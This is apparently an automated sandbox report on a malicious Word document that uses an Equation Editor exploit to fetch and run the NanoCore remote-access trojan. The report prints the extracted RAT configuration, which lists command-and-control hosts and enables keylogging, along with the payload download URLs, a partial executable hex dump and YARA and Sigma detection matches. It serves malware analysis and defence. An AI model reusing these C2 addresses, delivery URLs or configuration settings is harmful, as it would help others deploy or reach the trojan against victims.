Loading ...

Play interactive tourEdit tour

Analysis Report 471e3984_by_Libranalysis

Overview

General Information

Sample Name:471e3984_by_Libranalysis (renamed file extension from none to docx)
Analysis ID:402828
MD5:471e39840386d6b9c8e565123a389364
SHA1:d9050e2115ee03a7c8e0acc87d199ce0b4b7422a
SHA256:012300706ce75e6e82abdaa865aa8ff684aef99eda98f9094278b8df84e9642c
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Contains an external reference to another document
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 152 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2904 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2860 cmdline: 'C:\Users\Public\vbc.exe' MD5: 042AA11C6D49E1CCA5923F02D1B0A5AE)
      • RegSvcs.exe (PID: 3040 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)
      • RegSvcs.exe (PID: 3036 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)
      • RegSvcs.exe (PID: 2988 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "21f4355e-8257-4e77-8f1b-c822c6ea", "Group": "BUILD", "Domain1": "79.134.225.26", "Domain2": "nassiru1166main.ddns.net", "Port": 1133, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2388935709.0000000002280000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x5fee:$x1: NanoCore.ClientPluginHost
  • 0x602b:$x2: IClientNetworkHost
00000009.00000002.2388935709.0000000002280000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x5fee:$x2: NanoCore.ClientPluginHost
  • 0x9441:$s4: PipeCreated
  • 0x6018:$s5: IClientLoggingHost
00000009.00000002.2388684959.0000000000910000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x350b:$x1: NanoCore.ClientPluginHost
  • 0x3525:$x2: IClientNetworkHost
00000009.00000002.2388684959.0000000000910000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x350b:$x2: NanoCore.ClientPluginHost
  • 0x52b6:$s4: PipeCreated
  • 0x34f8:$s5: IClientLoggingHost
00000009.00000002.2388645448.00000000008A0000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x5b99:$x1: NanoCore.ClientPluginHost
  • 0x5bb3:$x2: IClientNetworkHost
Click to see the 36 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
9.2.RegSvcs.exe.3824d52.23.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x2dbb:$x1: NanoCore.ClientPluginHost
  • 0x2de5:$x2: IClientNetworkHost
9.2.RegSvcs.exe.3824d52.23.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x2dbb:$x2: NanoCore.ClientPluginHost
  • 0x4c6b:$s4: PipeCreated
9.2.RegSvcs.exe.8a0000.11.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x5b99:$x1: NanoCore.ClientPluginHost
  • 0x5bb3:$x2: IClientNetworkHost
9.2.RegSvcs.exe.8a0000.11.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x5b99:$x2: NanoCore.ClientPluginHost
  • 0x6bce:$s4: PipeCreated
  • 0x5b86:$s5: IClientLoggingHost
9.2.RegSvcs.exe.3830f84.24.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x8ba5:$x1: NanoCore.ClientPluginHost
  • 0x15d0e:$x1: NanoCore.ClientPluginHost
  • 0x1c25c:$x1: NanoCore.ClientPluginHost
  • 0x2222d:$x1: NanoCore.ClientPluginHost
  • 0x2bc99:$x1: NanoCore.ClientPluginHost
  • 0x360c4:$x1: NanoCore.ClientPluginHost
  • 0x410a1:$x1: NanoCore.ClientPluginHost
  • 0x4ce43:$x1: NanoCore.ClientPluginHost
  • 0x6231b:$x1: NanoCore.ClientPluginHost
  • 0x8a57d:$x1: NanoCore.ClientPluginHost
  • 0x999bd:$x1: NanoCore.ClientPluginHost
  • 0xb1849:$x1: NanoCore.ClientPluginHost
  • 0xd9a97:$x1: NanoCore.ClientPluginHost
  • 0x8bd2:$x2: IClientNetworkHost
  • 0x15d47:$x2: IClientNetworkHost
  • 0x1c295:$x2: IClientNetworkHost
  • 0x2bdf6:$x2: IClientNetworkHost
  • 0x360fd:$x2: IClientNetworkHost
  • 0x410bb:$x2: IClientNetworkHost
  • 0x4ce5d:$x2: IClientNetworkHost
  • 0x62348:$x2: IClientNetworkHost
Click to see the 83 entries

Sigma Overview

System Summary:

barindex
Sigma detected: File Dropped By EQNEDT32EXEShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2904, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2988, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\v[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B75759.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
Found malware configurationShow sources
Source: 9.2.RegSvcs.exe.3830f84.24.raw.unpackMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "21f4355e-8257-4e77-8f1b-c822c6ea", "Group": "BUILD", "Domain1": "79.134.225.26", "Domain2": "nassiru1166main.ddns.net", "Port": 1133, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exeReversingLabs: Detection: 23%
Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 23%
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2988, type: MEMORY
Source: Yara matchFile source: 9.2.RegSvcs.exe.3830f84.24.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.9a0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 6.2.vbc.exe.3b30110.4.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.9a0000.14.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.9a4629.13.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 6.2.vbc.exe.3b30110.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.3824d52.23.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.381ff26.25.raw.unpack, type: UNPACKEDPE
Source: 9.2.RegSvcs.exe.9a0000.14.unpackAvira: Label: TR/NanoCore.fadte
Source: 9.2.RegSvcs.exe.400000.1.unpackAvira: Label: TR/Dropper.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknownHTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknownHTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknownHTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknownHTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: Binary string: ystem.pdb source: RegSvcs.exe, 00000009.00000002.2388951681.0000000002296000.00000004.00000040.sdmp
Source: Binary string: Rbvcs.pdbs~ source: RegSvcs.exe, 00000009.00000002.2388951681.0000000002296000.00000004.00000040.sdmp
Source: Binary string: pC:\Windows\System.pdb source: RegSvcs.exe, 00000009.00000002.2390017594.0000000004D9C000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source: Binary string: indows\System.pdbpdbtem.pdb source: RegSvcs.exe, 00000009.00000002.2389919111.000000000473D000.00000004.00000001.sdmp
Source: Binary string: System.pdbX source: RegSvcs.exe, 00000009.00000002.2388951681.0000000002296000.00000004.00000040.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: vbc.exe, 00000006.00000002.2131108315.0000000000E70000.00000002.00000001.sdmp, RegSvcs.exe, 00000009.00000002.2388359155.0000000000540000.00000002.00000001.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 4x nop then mov esp, ebp9_2_0039AF31
Source: global trafficDNS query: name: cutt.ly
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.8.238:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.8.238:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49169 -> 172.67.8.238:80
Source: TrafficSnort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49170 -> 172.67.8.238:80
Source: TrafficSnort IDS: 3132 WEB-CLIENT PNG large image width download attempt 172.245.45.28:80 -> 192.168.2.22:49175
C2 URLs / IPs found in malware configurationShow sources
Source: Malware configuration extractorURLs: 79.134.225.26
Source: Malware configuration extractorURLs: nassiru1166main.ddns.net
Uses dynamic DNS servicesShow sources
Source: unknownDNS query: name: nassiru1166main.ddns.net
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 79.134.225.26:1133
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 May 2021 12:31:02 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3Last-Modified: Mon, 03 May 2021 07:22:11 GMTETag: "116c00-5c167d1eb0284"Accept-Ranges: bytesContent-Length: 1141760Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a3 a4 8f 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 58 11 00 00 12 00 00 00 00 00 00 92 77 11 00 00 20 00 00 00 80 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 77 11 00 4f 00 00 00 00 80 11 00 d0 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 57 11 00 00 20 00 00 00 58 11 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 0e 00 00 00 80 11 00 00 10 00 00 00 5a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 11 00 00 02 00 00 00 6a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 77 11 00 00 00 00 00 48 00 00 00 02 00 05 00 04 84 00 00 3c 99 00 00 03 00 00 00 01 00 00 06 40 1d 01 00 00 5a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 20 00 00 0a 28 21 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 22 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 17 28 26 00 00 0a 00 02 16 28 27 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 60 01 00 06 28 28 00 00 0a 00 2a 26 00 02 28 29 00 00 0a 00 2a ce 73 2a 00 00 0a 80 01 00 00 04 73 2b 00 00 0a 80 02 00 00 04 73 2c 00 00 0a 80 03 00 00 04 73 2d 00 00 0a 80 04 00 00 04 73 2e 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 32 00 00 0a
Source: Joe Sandbox ViewIP Address: 172.67.8.238 172.67.8.238
Source: Joe Sandbox ViewIP Address: 79.134.225.26 79.134.225.26
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global trafficHTTP traffic detected: GET /reg/v.dot HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: nta.hopto.org
Source: global trafficHTTP traffic detected: GET /reg/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: nta.hopto.orgConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknownHTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknownHTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknownHTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.26
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE4CB73-349E-46EF-BF24-C3A751787722}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /reg/v.dot HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: nta.hopto.org
Source: global trafficHTTP traffic detected: GET /reg/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: nta.hopto.orgConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: cutt.ly
Source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmpString found in binary or memory: http://google.com
Source: reg on nta.hopto.org.url.0.drString found in binary or memory: http://nta.hopto.org/reg/
Source: RegSvcs.exe, 00000009.00000002.2390042408.0000000004EF0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: RegSvcs.exe, 00000009.00000002.2390042408.0000000004EF0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: dbzEXdF.url.0.drString found in binary or memory: https://cutt.ly/dbzEXdF
Source: vbc.exeString found in binary or memory: https://github.com/unguest
Source: vbc.exe.4.drString found in binary or memory: https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
Source: unknownHTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: RegSvcs.exe, 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

E-Banking Fraud:

barindex
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2988, type: MEMORY
Source: Yara matchFile source: 9.2.RegSvcs.exe.3830f84.24.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.9a0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 6.2.vbc.exe.3b30110.4.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.9a0000.14.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.9a4629.13.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 6.2.vbc.exe.3b30110.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.3824d52.23.raw.unpack, type: UNPACKEDPE
